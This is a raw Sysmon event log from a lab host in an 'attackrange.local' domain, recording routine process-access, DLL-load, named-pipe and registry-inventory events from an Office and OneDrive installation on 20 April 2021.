14:58:12.670{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.670{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.670{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.670{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000078840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.638{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncViews.dll2021-04-20 14:58:12.638 10341000x800000000000000078839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.638{A7A01FEF-C0A6-607E-7805-00000000BB01}424612C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000078838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.638{A7A01FEF-C0A6-607E-7805-00000000BB01}424612C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 11241100x800000000000000078837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.592{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogUploader.dll2021-04-20 14:58:12.560 18141800x800000000000000078836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.560{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.560{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncShell.dll2021-04-20 14:58:12.560 18141800x800000000000000078834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.388{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncSessions.dll2021-04-20 14:58:12.388 18141800x800000000000000078820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.310{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncFALWB.dll2021-04-20 14:58:12.310 10341000x800000000000000078818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.295{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.295{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000078816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.279{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoggingPlatform.dll2021-04-20 14:58:12.279 10341000x800000000000000078815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.263{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.263{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000078813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:12.263{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{04ca2606-0a2e-367e-a2fb-26c76be768f9}\Root\InventoryApplicationFile\officesetup.exe|4652edac3f357508\BinProductVersion16.0.13801.0 13241300x800000000000000078812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:12.263{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{04ca2606-0a2e-367e-a2fb-26c76be768f9}\Root\InventoryApplicationFile\officesetup.exe|4652edac3f357508\LinkDate02/27/2021 04:29:24 13241300x800000000000000078811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:12.263{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{04ca2606-0a2e-367e-a2fb-26c76be768f9}\Root\InventoryApplicationFile\officesetup.exe|4652edac3f357508\Publishermicrosoft corporation 13241300x800000000000000078810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:12.263{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{04ca2606-0a2e-367e-a2fb-26c76be768f9}\Root\InventoryApplicationFile\officesetup.exe|4652edac3f357508\LowerCaseLongPathc:\temp\officesetup.exe 11241100x800000000000000078809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.248{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5QuickTemplates2.dll2021-04-20 14:58:12.248 18141800x800000000000000078808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:12.013{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncFAL.dll2021-04-20 14:58:12.013 18141800x800000000000000078802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:12.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 